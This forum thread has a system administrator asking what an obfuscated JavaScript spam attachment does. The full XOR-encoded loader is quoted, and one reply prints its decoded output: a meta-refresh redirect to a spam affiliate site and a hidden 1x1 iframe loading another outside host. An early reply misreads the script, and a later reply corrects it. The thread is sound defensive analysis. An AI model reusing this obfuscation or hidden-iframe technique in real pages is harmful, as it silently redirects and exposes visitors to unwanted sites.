Hi, I don't know Javascript but I got this unusual e-mail attachment attached to spam today. As a system admin I have a look at the weird attachments that get through in case they are a new virus or a file extension that I should be blocking. When I saved the attachment and opened it in an editor, I found this:


<script language="JavaScript">
flowered = new Array(133,
182,11,225,57,52,118,146,205,158,18,
5,105,92,254,186,21,195,42,168,132,
154,3,188,21,246,106,17,236,103,138,
150,164,124,77,105,51,24,62,139,185,
20,23,199,98,172,167,117,103,122,18,
30,244,33,30,122,13,219,79,160,9,
2,249,111,86,205,124,30,80,189,75,
61,197,184,117,109,151,13,227,56,217,
94,54,179,154,27,77,238,72,42,110,
85,41,183,252,201,61,35,205,255,38,
30,35,142,183,149,150,9,189,227,250,
183,167,145,134,152,184,238,59,223,35,
152,234,158,1,29,203,69,120,58,225,
33,255,182,139,56,16,58,190,163,195,
223,81,83,204,64,187,57,23,24,213,
1,135,38,190,155,104,224,67,2,107,
177,200,255,176,152,251,28,62,150,217,
75,249,153,140,58,200,28,120,30,251,
133,246,39,40,72,3,128,213,9,237,
3,149,166,241,75,244,0,166,47,6,
248,116,222,194,241,42,75,124,111,69,
116,139,178,68,82,211,125,167,167,62,
107,103,85,19,149,82,123,24,120,201,
24,181,27,20,170,44,16,223,107,9,
106,163,95,101,131,165,36,48,213,20,
149,19,136,3,127,253,204,29,69,215,
72,34,58,0,109,229,129,158,17,91,
173,137,41,5,122,134,173,217,135,90,
192,136,175,153,143,156,174,177,192,250,
88,186,66,155,197,252,73,70,243,58,
22,81,168,91,130,164,156,116,30,52,
182,168,201,131,7,81,203,79,188,57,
75,83,133,46,142,41,174,154,121,247,
27,81,55,174,215,252,234,184,153,90,
113,225,254,96,217,241,195,110,140,61,
79,50,223,185,130,106,117,13,0,156,
194,77,203,61,225,213,132,87,231,40,
192,21,53,208,87,221,237,147,98,16,
68,1,39,23,198);

suicidal = new Array(185,
254,95,172,117,10,123,152,241,214,87,
68,45,98,243,176,41,174,79,220,229,
186,107,200,97,134,71,116,157,18,227,
224,153,94,63,12,85,106,91,248,209,
54,55,164,13,194,211,16,9,14,47,
60,197,26,75,40,65,230,39,212,125,
114,195,64,121,190,31,108,53,202,59,
88,177,150,23,4,237,34,179,112,233,
110,15,156,165,122,43,136,33,70,7,
52,93,210,163,160,89,30,255,204,21,
42,27,184,145,246,247,100,205,130,147,
208,201,206,239,252,133,218,11,232,1,
166,231,148,61,50,131,0,57,126,223,
44,245,138,251,24,113,86,215,196,173,
226,115,48,169,46,207,92,101,58,235,
72,225,6,199,244,29,146,99,96,25,
222,191,140,213,234,219,120,81,182,183,
36,141);
annotates = 386;
reminders = 173;
var Samuelson = "";
for(scale = 0; scale < annotates; scale++)
Samuelson = Samuelson + String.fromCharCode(flowered[scale] ^ suicidal[scale % reminders]);
document.write(Samuelson);
</script>


Can someone please tell me what this script is meant to do? The word suicidal kind of leads me to believe that it is not something innocent.

Many thanks,
Steve

:D It will write on a web page (or a html attached to your mail)about 386 times Samuelson+some numbers . Nothing lethal, I think

Nope not entirelly correct lol

it makes the following code.


<HTML>
<HEAD>
<meta http-equiv="refresh" content="1;URL=http://screwpet.biz/PH009/?affiliate_id=233486&campaign_id=407">
</HEAD>
<p align="center">If your browser do not redirect please CLICK <a href="http://screwpet.biz/PH009/?affiliate_id=233486&campaign_id=407">HERE</a></p>
<IFRAME SRC="http://www.globaldatabase.info/index1.php?RB" WIDTH=1 HEIGHT=1 border=0></IFRAME>
</HTML>

Yeah, I tried it and that's exactly what it did. Strange that it can redirect without an actual URL in the code.

Thanks for the help folks.

-Steve

Its the META tag that refreshes the page. This a common tactic for homepage hijackers.

I had not tried it.... Yet I say it is not of a kind of virus... It's a sort of popup unwnated. Not lethal, as I saids.